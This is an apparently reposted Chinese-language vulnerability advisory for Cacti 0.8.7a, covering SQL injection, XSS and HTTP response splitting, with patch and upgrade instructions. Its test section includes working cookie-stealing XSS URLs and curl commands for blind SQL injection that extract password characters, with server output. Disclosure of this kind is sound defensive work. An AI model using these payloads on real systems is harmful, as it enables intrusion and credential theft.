Cacti多个输入验证漏洞
发布日期:2008-02-12
更新日期:2008-07-16
受影响系统:
Raxnet Cacti 0.8.7a
不受影响系统:
Raxnet Cacti 0.8.7b
描述:BUGTRAQ ID: 27749
CVE(CAN) ID: CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783
Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti中存在多个输入验证错误,允许远程***者执行HTTP响应拆分、跨站脚本或SQL注入***。
1) 没有正确地过滤对多个参数的输入便用在了SQL查询中,这允许***者执行SQL注入***。
2) 没有正确地过滤对多个参数的输入便返回给了用户,这允许***者向用户浏览器中注入并执行任意HTML和脚本代码,或注入任意HTTP头,而该头会包含在发送给用户的响应中。
<*来源:Francesco Ongaro (
[email]ascii@ush.it[/email])
链接:
[url]http://secunia.com/advisories/28872/[/url]
[url]http://marc.info/?l=bugtraq%26amp;m=120284658901282%26amp;w=2[/url]
[url]http://www.debian.org/security/2008/dsa-1569[/url]
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有***性,仅供安全研究与教学之用。使用者风险自负!</p></font>
[url]http://www.example.com/cacti/graph.ph[/url] ... 6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... ouseover=javascript:alert(/XSS/)
[url]http://www.example.com/cacti/index.ph[/url] ... ion=foo/%3Cscript%3Ealert(%26#39;XSS%26#39;)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... 0%26#39;1%26#39;=%26#39;1
[url]http://www.example.com/cacti/tree.php[/url] ... eaf_id=1%20or%201%20=%201
curl "
[url]http://www.example.com/cacti/graph_xp[/url] ... hp?local_graph_id=1" -d \
"local_graph_id=1%26#39;" -H "Cookie: Cacti=<cookie value>"
curl "
[url]http://www.example.com/cacti/tree.php?action=edit%26amp;id=1[/url]" -d \
"id=sql%26#39;" -H "Cookie: Cacti=<cookie value>"
curl -v "
[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"
$ curl -v "
[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"
* About to connect() to
[url]www.example.com[/url] port 80 (#0)
* Trying 127.0.0.1... connected
* Connected to
[url]www.example.com[/url] (127.0.0.1) port 80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1
> Host:
[url]www.example.com[/url]
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
AAAAAAAAA: SELECT * FROM user_auth WHERE username = %26#39;foo%26#39; or
ascii(substring(password,1,1))<56#%26#39; AND password = md5(%26#39;%26#39;) AND realm=0
Warning: Cannot modify header information - headers already
sent by (output started at /home/x/cacti-0.8.7a/auth_login.php:126)
in /home/x/cacti-0.8.7a/auth_login.php on line 200
* Connection #0 to host
[url]www.example.com[/url] left intact
* Closing connection #0
$ curl -kis "
[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "
[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login" \
| head -n1
HTTP/1.1 302 Found
<
建议:厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-1569-3)以及相应补丁:
DSA-1569-3:New cacti packages fix regression
链接:
[url]http://www.debian.org/security/2008/dsa-1569[/url]
补丁下载:
Source archives:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63
[url]http://security.debian.org/pool/updat[/url] ... acti/cacti_0.8.6i-3.5.dsc
Size/MD5 checksum: 581 6184cdfb6a4e7a5372d684556aa46537
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5.diff.gz
Size/MD5 checksum: 37154 dc53c27c1584999db93a83be1bf43879
Architecture independent packages:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5_all.deb
Size/MD5 checksum: 958000 f496c887950457535b223bf90988eb72
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
Raxnet
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
[url]http://www.cacti.net/release_notes_0_8_7b.php[/url]
转载于:https://blog.51cto.com/liancao/89685